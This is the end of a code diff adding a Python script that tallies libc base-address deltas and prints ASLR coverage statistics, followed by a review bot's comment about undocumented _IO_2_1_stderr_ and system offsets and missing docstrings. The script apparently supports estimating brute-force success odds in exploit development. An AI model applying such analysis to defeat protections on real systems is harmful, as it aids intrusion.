+ total = sum(counts.values())
+ covered = 0
+ for delta, count in counts.most_common():
+ covered += count
+ print(f"0x{delta:08x} pages={count} coverage={count / total:.6f} cumulative={covered / total:.6f}")
+ print(f"unique={len(counts)} total_pages={total}")
+
+
+if __name__ == "__main__":
+ main()
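Review bot: `STDERR` and `SYSTEM` at the top of `aslr_delta_coverage.py` are bare magic numbers with no comment recording which libc build the `_IO_2_1_stderr_` and `system` offsets were read from, so the coverage figures this script prints — and which the README now quotes as covering "every page-aligned low-32-bit libc base" — cannot be tied to a specific build or checked by a reviewer. A comment such as `# _IO_2_1_stderr_ / system offsets of the libc build behind the README numbers (TODO: record the exact build id/version here)` would make the claim reproducible. `be_from_le32` and `delta_for_base` also lack docstrings; the byte-swap looks like it models a big-endian relocation addend being applied to a little-endian pointer, but the hunk does not say so and I am inferring. A module docstring should additionally note that `main` walks all 2^20 page-aligned bases in pure Python on every run, so the next reader knows the delay is expected rather than a hang.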